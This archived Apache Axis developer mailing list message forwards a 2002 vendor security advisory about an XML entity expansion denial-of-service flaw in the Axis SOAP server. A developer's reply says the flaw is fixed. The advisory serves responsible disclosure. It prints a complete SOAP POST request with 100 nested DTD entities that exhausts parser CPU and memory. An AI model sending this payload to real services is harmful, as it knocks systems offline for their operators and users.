axis-java-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Davanum Srinivas <d...@yahoo.com>
Subject Re: Fw: Security Alert - Apache/Axis
Date Tue, 26 Nov 2002 19:03:22 GMT
I think tom fixed it (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)

Thanks,
dims

--- Ted Leung <twleung@sauria.com> wrote:
> This security alert came through today.
> 
> Ted
> ----- Original Message -----
> From: "Ian Holsman" <ianh@cnet.com>
> To: <security@apache.org>
> Cc: "Ory Segal" <ORY.SEGAL@sanctuminc.com>
> Sent: Tuesday, November 26, 2002 8:02 AM
> Subject: Security Alert - Apache/Axis
> 
> 
> > Dear security@apache.org,
> >
> > During a recent security audit at one of our customers, Sanctum found a
> > security vulnerability in your product Apache/Axis.
> > The details of this vulnerability are described in the attached text file.
> >
> > We intend to issue a public advisory on BugTraq, SecuriTeam and other site
> > forums about this vulnerability the last week of November.  Please note,
> the
> > advisory will not contain specifics that might enable someone to exploit
> the
> > vulnerability.
> >
> > We would appreciate it if you could issue a patch in that timeline (i.e.
> > around November 25th), so it can be linked to our advisory.
> >
> > Please feel free to contact me for more information/help.
> >
> > Thanks,
> > -Amit
> >
> >  <<XML_DTD_Axis.txt>>
> >
> >
> 
> 
> ----------------------------------------------------------------------------
> ----
> 
> 
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: security-unsubscribe@apache.org
> > For additional commands, e-mail: security-help@apache.org
> > ///////////////////////////////////////////////////////////////////////
> ========================>> Security Advisory <<========================
> ///////////////////////////////////////////////////////////////////////
> 
> 
> => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
> 
> => Release date: 14/Nov/2002
> 
> => Vendor: Apache Group
> 
> The following product was found to be vulnerable: 
> 
>   - Apache Axis SOAP server (checked with Xerces-J and Tomcat)
> 
> The versions affected are the latest ones (as of October 2002).
> 
> => Severity: High
> 
> => CVE candidate: Not assigned yet.
> 
> => Summary: Using the DTD part of the XML document, it is possible to cause the 
> XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in 
> a denial of service condition.
> 
> => Description: The DTD part of the XML document enables the document to define 
> named entities (other than the predefined &lt;, &gt;, etc.). The entities can
be
> defined using other entities (recursion is prohibited in XML 1.0). 
> Entities are expanded when they are referenced, inside the XML document. 
> The attack is comprised of defining and referencing an entity which is defined 
> using two instances of another entity, which is (in turn) defined as two instances
> of yet another entity, and so on. This definition process can be repeated as long
> as "necessary" - we found that nesting level of 100 is usually sufficient.
> The 100th entity should be defined simply as a string. This has the effect of having
> the first entity contain, in theory, 2^99 (two to the power of ninety nine) 
> concatenated values of the 100th entity.
> Here's an example (the DTD is to be placed after the XML declaration, and before the

> root element of the XML document):
> 
> 	<!DOCTYPE root [
> 	<!ENTITY x100 "foobar">
> 	<!ENTITY  x99 "&x100;&x100;">
> 	<!ENTITY  x98 "&x99;&x99;">
> 	<!ENTITY  x97 "&x98;&x98;">
> 	...
> 	<!ENTITY   x3 "&x4;&x4;">
> 	<!ENTITY   x2 "&x3;&x3;">
> 	<!ENTITY   x1 "&x2;&x2;">
> 	]>
> 
> Referring to the first entity inside a document that would otherwise be accepted by
> the application (using the syntax &x1;), results in a DoS condition, due to the 
> excessive CPU load and/or memory load required by the XML parser to expand this entity.

> 
> => Solution: Not available yet.
> 
> => Workaround: Not available yet.
> 
> => Example:
> 
> Ory Segal from Sanctum devised a SOAP request that manages to mount this attack requiring

> only a path to an existing web service to be known to the attacker. 
> 
> The request is:
> 
> POST path_to_web_service HTTP/1.0
> Host: ...
> Content-Type: text/xml
> SOAPAction: ""
> Content-Length: 3224
> 
> <?xml version="1.0" ?>
> <!DOCTYPE foobar [
> 	<!ENTITY x0 "hello">
> 	<!ENTITY x1 "&x0;&x0;">
> 	<!ENTITY x2 "&x1;&x1;">
> 	<!ENTITY x3 "&x2;&x2;">
> 	<!ENTITY x4 "&x3;&x3;">
> 	<!ENTITY x5 "&x4;&x4;">
> 	<!ENTITY x6 "&x5;&x5;">
> 	<!ENTITY x7 "&x6;&x6;">
> 	<!ENTITY x8 "&x7;&x7;">
> 	<!ENTITY x9 "&x8;&x8;">
> 	<!ENTITY x10 "&x9;&x9;">
> 	<!ENTITY x11 "&x10;&x10;">
> 	<!ENTITY x12 "&x11;&x11;">
> 	<!ENTITY x13 "&x12;&x12;">
> 	<!ENTITY x14 "&x13;&x13;">
> 	<!ENTITY x15 "&x14;&x14;">
> 	<!ENTITY x16 "&x15;&x15;">
> 	<!ENTITY x17 "&x16;&x16;">
> 	<!ENTITY x18 "&x17;&x17;">
> 	<!ENTITY x19 "&x18;&x18;">
> 	<!ENTITY x20 "&x19;&x19;">
> 	<!ENTITY x21 "&x20;&x20;">
> 	<!ENTITY x22 "&x21;&x21;">
> 	<!ENTITY x23 "&x22;&x22;">
> 	<!ENTITY x24 "&x23;&x23;">
> 	<!ENTITY x25 "&x24;&x24;">
> 	<!ENTITY x26 "&x25;&x25;">
> 	<!ENTITY x27 "&x26;&x26;">
> 	<!ENTITY x28 "&x27;&x27;">
> 	<!ENTITY x29 "&x28;&x28;">
> 	<!ENTITY x30 "&x29;&x29;">
> 	<!ENTITY x31 "&x30;&x30;">
> 	<!ENTITY x32 "&x31;&x31;">
> 	<!ENTITY x33 "&x32;&x32;">
> 	<!ENTITY x34 "&x33;&x33;">
> 	<!ENTITY x35 "&x34;&x34;">
> 	<!ENTITY x36 "&x35;&x35;">
> 	<!ENTITY x37 "&x36;&x36;">
> 	<!ENTITY x38 "&x37;&x37;">
> 	<!ENTITY x39 "&x38;&x38;">
> 	<!ENTITY x40 "&x39;&x39;">
> 	<!ENTITY x41 "&x40;&x40;">
> 	<!ENTITY x42 "&x41;&x41;">
> 	<!ENTITY x43 "&x42;&x42;">
> 	<!ENTITY x44 "&x43;&x43;">
> 	<!ENTITY x45 "&x44;&x44;">
> 	<!ENTITY x46 "&x45;&x45;">
> 	<!ENTITY x47 "&x46;&x46;">
> 	<!ENTITY x48 "&x47;&x47;">
> 	<!ENTITY x49 "&x48;&x48;">
> 	<!ENTITY x50 "&x49;&x49;">
> 	<!ENTITY x51 "&x50;&x50;">
> 	<!ENTITY x52 "&x51;&x51;">
> 	<!ENTITY x53 "&x52;&x52;">
> 	<!ENTITY x54 "&x53;&x53;">
> 	<!ENTITY x55 "&x54;&x54;">
> 	<!ENTITY x56 "&x55;&x55;">
> 	<!ENTITY x57 "&x56;&x56;">
> 	<!ENTITY x58 "&x57;&x57;">
> 	<!ENTITY x59 "&x58;&x58;">
> 	<!ENTITY x60 "&x59;&x59;">
> 	<!ENTITY x61 "&x60;&x60;">
> 	<!ENTITY x62 "&x61;&x61;">
> 	<!ENTITY x63 "&x62;&x62;">
> 	<!ENTITY x64 "&x63;&x63;">
> 	<!ENTITY x65 "&x64;&x64;">
> 	<!ENTITY x66 "&x65;&x65;">
> 	<!ENTITY x67 "&x66;&x66;">
> 	<!ENTITY x68 "&x67;&x67;">
> 	<!ENTITY x69 "&x68;&x68;">
> 	<!ENTITY x70 "&x69;&x69;">
> 	<!ENTITY x71 "&x70;&x70;">
> 	<!ENTITY x72 "&x71;&x71;">
> 	<!ENTITY x73 "&x72;&x72;">
> 	<!ENTITY x74 "&x73;&x73;">
> 	<!ENTITY x75 "&x74;&x74;">
> 	<!ENTITY x76 "&x75;&x75;">
> 	<!ENTITY x77 "&x76;&x76;">
> 	<!ENTITY x78 "&x77;&x77;">
> 	<!ENTITY x79 "&x78;&x78;">
> 	<!ENTITY x80 "&x79;&x79;">
> 	<!ENTITY x81 "&x80;&x80;">
> 	<!ENTITY x82 "&x81;&x81;">
> 	<!ENTITY x83 "&x82;&x82;">
> 	<!ENTITY x84 "&x83;&x83;">
> 	<!ENTITY x85 "&x84;&x84;">
> 	<!ENTITY x86 "&x85;&x85;">
> 	<!ENTITY x87 "&x86;&x86;">
> 	<!ENTITY x88 "&x87;&x87;">
> 	<!ENTITY x89 "&x88;&x88;">
> 	<!ENTITY x90 "&x89;&x89;">
> 	<!ENTITY x91 "&x90;&x90;">
> 	<!ENTITY x92 "&x91;&x91;">
> 	<!ENTITY x93 "&x92;&x92;">
> 	<!ENTITY x94 "&x93;&x93;">
> 	<!ENTITY x95 "&x94;&x94;">
> 	<!ENTITY x96 "&x95;&x95;">
> 	<!ENTITY x97 "&x96;&x96;">
> 	<!ENTITY x98 "&x97;&x97;">
> 	<!ENTITY x99 "&x98;&x98;">
> 	<!ENTITY x100 "&x99;&x99;">
> ]>
> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
> xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
> xmlns:xsd="http://www.w3.org/1999/XMLSchema">
> <SOAP-ENV:Body>
> <ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
> <foobar xsi:type="xsd:string">&x100;</foobar>
> </ns1:aaa>
> </SOAP-ENV:Body>
> </SOAP-ENV:Envelope>
> 
> 


=====
Davanum Srinivas - http://xml.apache.org/~dims/

__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com

Mime
View raw message